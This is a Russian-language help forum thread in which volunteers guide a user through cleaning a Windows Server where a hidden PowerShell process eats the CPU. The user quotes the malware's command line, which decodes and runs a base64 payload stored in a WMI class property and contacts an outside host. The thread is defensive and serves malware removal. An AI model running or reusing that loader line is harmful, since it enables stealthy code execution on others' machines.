В процессах появляется строчка Powershell и использует 95-100% процессорных ресурсов

**lex_fan** · 06.10.2017, 20:05

Добрый день, OC Win Server 2012 r2 std, за последнее время замечен процесс powershell который съедает ресурсы! Поковыряв удалось увидеть внутри процесса:
Командная строка с текстом powershell -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

И адрес на который стучится скрипт static.30.12.130.94.clients.your-server.de

DR WEB Curit Нашел вирусы и обезвредил, но проблема не решилась

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 06.10.2017, 20:07

Уважаемый(ая) lex_fan, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**mike 1** · 07.10.2017, 20:54

Скачайте Universal Virus Sniffer (uVS)
Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

!!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.
Дождитесь окончания работы программы и прикрепите лог к посту в теме.

!!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

**lex_fan** · 08.10.2017, 20:11

Mike 1, спасибо, но скачанная по ссылке из вашего поста программа выдает ошибку и закрывается, как поступить?

**mike 1** · 08.10.2017, 21:56

Какую ошибку? Сделайте скриншот.

**lex_fan** · 08.10.2017, 22:34

При повторных запусках названия программы вызывающей ошибку меняется.

**mike 1** · 08.10.2017, 23:43

Попробуйте снять галочку с Антисплайсинг при запуске uVS

**lex_fan** · 09.10.2017, 00:07

Аналогичная ошибка!

**mike 1** · 09.10.2017, 19:06

В папке с uVS файлов с расширением dmp случайно нет?

**lex_fan** · 09.10.2017, 22:45

С таким расширением файлов не нашел, на сайте dsrt.dyndns.org нашел версию 400 из нее удалось сделать образ

**mike 1** · 09.10.2017, 23:21

Конечно хотелось бы получить лог актуальной версией uvs. А галочка "Выгружать неизвестные DLL библиотеки" случайно не стоит?

Выполните скрипт в uVS:

Код:

;uVS v4.0.6 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v400c
breg

delall %Sys32%\CONFIG\SYSTEM~1\APPDATA\LOCAL\PNGKWF~1\SVR.EXE

В папке uvs с версией 4.0.10 запустите от имени Администратора файл report_crash.exe

Скачайте Farbar Recovery Scan Tool

и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".
Нажмите кнопку Scan.
После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

**lex_fan** · 10.10.2017, 00:06

к сожалению не смог прикрепить все файлы, выложил на фсйлообменник https://cloud.mail.ru/public/E8kQ/XESbCi9qN

**mike 1** · 11.10.2017, 17:58

C:\Users\Lexey\Desktop\b.bat

Это знакомо?

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

Временно выгрузите антивирус, файрволл и прочее защитное ПО.
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:
```
CreateRestorePoint:
2017-10-05 09:47 - 2017-10-05 09:47 - 000187712 _____ () C:\Users\Lexey\AppData\Local\Temp\downloader.exe
```
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

**lex_fan** · 11.10.2017, 20:08

C:\Users\Lexey\Desktop\b.bat - это скрипт который запускается каждые 5 минут и рубит powershell процессы

**mike 1** · 11.10.2017, 21:02

Скачайте отсюда Malwarebytes' Anti-Malware или с зеркала.
Установите MBAM с настройками по умолчанию.
После установки в главном окне программы, выберите "Параметры".
В параметрах перейдите на вкладку "Личный кабинет" и нажмите на кнопку "Деактивировать ознакомительную премиум версию".
При появлении окошка предупреждения, нажмите "Yes".
Обновите базы, выберите "Проверка" => "Выборочное сканирование", нажмите "Настроить сканирование".
Сделайте настройки как показано на рисунке ниже:
Для сканирование отметьте все доступные диски и нажмите "Запустить проверку"

Самостоятельно ничего не удаляйте!!!.
По окончанию проверки, нажмите на кнопку "Сохранить результаты проверки", результат проверки сохраните в текстовой файл.
Сохраните лог на рабочий стол.
Прикрепите этот лог к следующему вашему сообщению.

**lex_fan** · 12.10.2017, 14:55

Был найден только один файл

**mike 1** · 12.10.2017, 22:22

Что сейчас с проблемой?

**lex_fan** · 16.10.2017, 20:20

Доброго времени суток, к сожалению проблема также актуальна

**Vvvyg** · 17.10.2017, 22:06

У вас на сервере открыты наружу множество портов: 135, 139, 445 (DCOM и SMB), 3389 (RDP), не настроенный IIS на 8080 и кое что ещё. Это всё - вероятные векторы атак и взлома, при наличии слабых паролей и незакрытых уязвимостей запустить удалённо на сервере можно что угодно. 135, 139, 445 вообще светить в интернет нельзя ни при каких условиях.
Патч от WannaCry хотя бы установлен? Иначе поиски зловреда на сервере - примерно как поиски грабителя в квартире, где постоянно дверь настежь.

**lex_fan** · 18.10.2017, 19:47

Спасибо, Был выключен брандмауэр, включил, закрыл порт 80 (Исходящий) -PS стучался именно по этому порту, теперь процесс появляется, но не грузит процессор, + по Вашей рекомендации закрыл порты, которые вы описали!
Но с появлением процесса вопрос так и не решился(((

В процессах появляется строчка Powershell и использует 95-100% процессорных ресурсов (заявка № 215620)

Опции темы